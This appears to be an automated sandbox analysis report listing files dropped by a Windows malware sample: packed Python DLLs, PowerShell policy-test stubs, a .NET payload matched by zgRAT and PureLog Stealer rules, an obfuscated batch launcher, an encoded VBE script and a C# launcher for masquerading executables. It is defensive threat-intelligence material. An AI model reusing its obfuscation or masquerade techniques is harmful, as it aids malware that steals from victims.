SSDEEP:	24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
MD5:	B93EDA8CC111A5BDE906505224B717C3
SHA1:	5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
SHA-256:	EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
SHA-512:	B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4...F...4...4...5...A...4...A...4...Al..4...A...4..Rich.4..........................PE..d...\(.b.........." .............P/..XE..`/..................................PF...........`...........................................E......yE.d....pE......PB.h............@F......................................dE.8...........................................UPX0.....P/.............................UPX1.........`/.....................@....rsrc........pE.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\select.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23536
Entropy (8bit):	7.33649667835335
Encrypted:	false
SSDEEP:	384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
MD5:	3CDFDB7D3ADF9589910C3DFBE55065C9
SHA1:	860EF30A8BC5F28AE9C81706A667F542D527D822
SHA-256:	92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
SHA-512:	1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fa!.".O.".O.".O.+x.. .O.puN. .O.puJ.).O.puK.*.O.puL.&.O..uN. .O.".N.b.O..rN.'.O..uB.#.O..uO.#.O..u..#.O..uM.#.O.Rich".O.................PE..d....(.b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	293360
Entropy (8bit):	7.986777578304979
Encrypted:	false
SSDEEP:	6144:zxrLHdbWP4Ue5eV0KpvRWXH4mxy2Vc2X8r1kNgi7XG09JE1j4sbV9n:zNNWP4H543vRWomxdXgku8X9U1j4sbrn
MD5:	2218B2730B625B1AEEE6A67095C101A4
SHA1:	AA7F032B9C8B40E5ECF2A0F59FA5AE3F48EFF90A
SHA-256:	5E9ADD4DD806C2DE4D694B9BB038A6716BADB7D5F912884D80D593592BCDB8CA
SHA-512:	77AA10AE645C0BA24E31DCAB4726D8FB7AA3CB9708C7C85499E7D82CE46609D43E5DC74DA7CD32C170C7DDF50C8DB8945BAF3452421316C4A46888D745DE8DA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.OJ).OJ).OJ).7.).OJ).:K(.OJ).:O(.OJ).:N(.OJ).:I(.OJ)i:K(.OJ){=K(.OJ).OK).OJ)i:G(.OJ)i:J(.OJ)i:.).OJ)i:H(.OJ)Rich.OJ)........PE..d....(.b.........." .....P...........U... ................................................`..........................................{..X....y.......p.......................{.......................................a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bcmn0yc.w0b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0inztago.p5f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1elc2d5y.goa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qocy32j.jwk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2n4k3wvr.hre.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atw0ql5u.m2g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btkxnynt.qcr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btsw0hlj.z1u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_df14bi2k.awo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhipprqx.zcw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ds2fm5jl.xvj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvrcdizy.c4j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqq3sjib.mlx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrlyivzk.kpc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlyt2eex.rhb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pu0td2qa.kgh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trv5tese.hco.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuu0xme0.yng.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yihzrzun.n1v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yub5b0db.vvt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bba2018c39ea80e6507645609af5208d547f6a81

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (328), with no line terminators
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.874891872468781
Encrypted:	false
SSDEEP:	6:dtflymqdU0PXLU/OWz8blJ1ZrnzoWhgrwgQoT/xUUQMEKcz3mgVkk:n9yV6ehWz8bxZrnUr8Kx+7mgVkk
MD5:	0659D3499B16A12FFCF1A5E550F8AC33
SHA1:	AC1E646A6DD5854445D68BA336BF9C70B63680C8
SHA-256:	A61C3D6B7DC17C60C47D064EC1157EFDE41AC6BF9DF23D365ABAF6939CD4E082
SHA-512:	10EF5E6652673B92302CF0631E87DED4B9E409E4E96205CE0FCC0E1D3FBE4F026C0C1E32224F113EADD840119C6BACE5F8146381313358C412D74E3E5F9B95C6
Malicious:	false
Preview:	H4sIAAAAAAAEAG2PzU7DMBCEXyXqGfWCuHBLE6pKFCkihUqwHIyzSQ22J/JP3PD0uBWHCrjt7qy+mXldVLdEjcPghCnWSrMnemhXUekuD0o6ePSBaK9sh+SLPdxnr5GKNaLtRFCwRNP18oaoE34DH5Z85MXVmfvk2WVeE9+1kkQ1ZDRsw8liLholQ3Qnv4T4PO5easzNXK7u7zYXiEeWmNjNRCNSph1Y63/lpKzGAHsh/q6FL6W1yKvjHsccOJm/YT9gT8/lONYiCKItpNBEOzYjkfHlkAu0YmJvYFWAI6oOQtkKpmWXo/ycz+C3b4CMeGFfAQAA

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.031377595969092
Encrypted:	false
SSDEEP:	3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
MD5:	77218AE27E9AD896918D9A081C61B1BE
SHA1:	3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
SHA-256:	E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
SHA-512:	6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
Malicious:	true
Preview:	%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.712224367043722
Encrypted:	false
SSDEEP:	6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
MD5:	D6DA6166258E23C9170EE2A4FF73C725
SHA1:	C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
SHA-256:	78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
SHA-512:	37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
Malicious:	true
Preview:	#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.

C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.0.cs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	426
Entropy (8bit):	4.987455236739546
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL62rV1XmrViFkD:JNVQIbSfhV7TiFkMSfhW2rVM4FkD
MD5:	C6EA1CDC393B6C8F4060A4831F67274A
SHA1:	49F82605781521D789FD1B5A5147EBBC8BDFF624
SHA-256:	B599438C72712DE8C2ADDC2EA38393D68F2A28537290D3C253CCE6B767A4AA91
SHA-512:	9FD80E911A585FE97B2EA6084379748AE639F3C13A991420942C921CC76E4FAD1E08410EEF36AD163395C764D4A3FEC2C3FD2C4FA1DA1A779DEDAA7B36FF349E
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.115037233190624
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f9FF7FKAn:Hu7L//TRq79cQWf1FGA
MD5:	BE2244D7FC5D50A209796F5C4749DA08
SHA1:	3A88923E7C2131C7958CF588F85A8B8615F4E80A
SHA-256:	E5E4D7F92F269C45E77025A641AAA681AD9B03CF86B75FB0ACE8A0A296543F1C
SHA-512:	DA785409E5BB6AF931D202F81F3A73E8906248598E128D6F3365BEFEF57C5522762D99E8562856FEFE37D5F8456B9BD9455916E60BCA9353A07916755D303975
Malicious:	false
